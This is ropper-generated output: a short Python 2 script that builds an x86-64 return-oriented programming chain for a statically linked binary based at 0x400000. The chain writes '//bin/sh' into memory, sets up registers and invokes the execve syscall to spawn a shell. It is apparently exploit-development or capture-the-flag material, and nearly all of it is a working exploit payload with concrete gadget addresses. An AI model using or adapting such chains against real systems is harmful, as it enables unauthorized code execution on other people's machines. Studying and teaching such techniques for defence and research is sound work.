


[*] Try permuation 1 / 24


#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000400000 # 5d8bf6195d5029932bc1b9cc264a936906c9eec2e07ff49fd7b8fc72ed01aa9a
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x000000000000ecf2) # 0x000000000040ecf2: pop r13; ret; 
rop += '//bin/sh'
rop += rebase_0(0x0000000000001696) # 0x0000000000401696: pop rdi; ret; 
rop += rebase_0(0x00000000000b70e0)
rop += rebase_0(0x0000000000065573) # 0x0000000000465573: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000000ecf2) # 0x000000000040ecf2: pop r13; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x0000000000001696) # 0x0000000000401696: pop rdi; ret; 
rop += rebase_0(0x00000000000b70e8)
rop += rebase_0(0x0000000000065573) # 0x0000000000465573: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000001696) # 0x0000000000401696: pop rdi; ret; 
rop += rebase_0(0x00000000000b70e0)
rop += rebase_0(0x0000000000006c30) # 0x0000000000406c30: pop rsi; ret; 
rop += rebase_0(0x00000000000b70e8)
rop += rebase_0(0x0000000000046e35) # 0x0000000000446e35: pop rdx; ret; 
rop += rebase_0(0x00000000000b70e8)
rop += rebase_0(0x000000000001e4af) # 0x000000000041e4af: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x0000000000071db5) # 0x0000000000471db5: syscall; ret; 
print rop
